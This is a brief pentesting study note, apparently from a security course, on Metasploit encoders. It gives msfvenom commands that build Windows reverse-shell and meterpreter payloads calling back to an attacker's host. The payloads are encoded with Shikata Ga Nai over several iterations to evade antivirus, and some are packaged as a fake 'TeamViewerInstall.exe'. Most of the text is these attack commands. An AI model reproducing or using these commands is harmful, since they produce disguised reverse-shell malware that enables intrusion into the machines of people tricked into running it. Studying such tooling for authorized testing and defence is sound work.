Encoders

About

Encoders help us with AV evasion and with keeping the payloads we use compatible with the target CPU. This involves removing Hexadecimal Opcodes also called "Bad Characters" and other stuff in order to keep payloads "hidden" and functional.

One of the most used encoding schemes now is Shikata Ga Nai (SGN) which translates to "Nothing can be done about it". Although not really the best anymore but here's a blog about it.

Using Encoders

Non-Encoded Payload

[!bash!]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\xBadChars" -f perl

Encoded Payload

[!bash!]$ msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\xBadChars" -f perl -e x86/shikata_ga_nai

Encoding a selected payload

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15
msf6 exploit(windows/smb/ms17_010_eternalblue) > show encoders
# One single iteration
[!bash!]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacking-ip> LPORT=8080 -e <the-path-from-prev-command> -f exe -o ./TeamViewerInstall.exe
# Multiple encoding iterations
[!bash!]$ msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacking-ip>> LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe

MSF - VirusTotal

Keep in mind that although we used encodings and iterations blablabla our payload is still pretty detectable by most of the AV solutions.

$msf-virustotal -k <API key> -f TeamViewerInstall.exe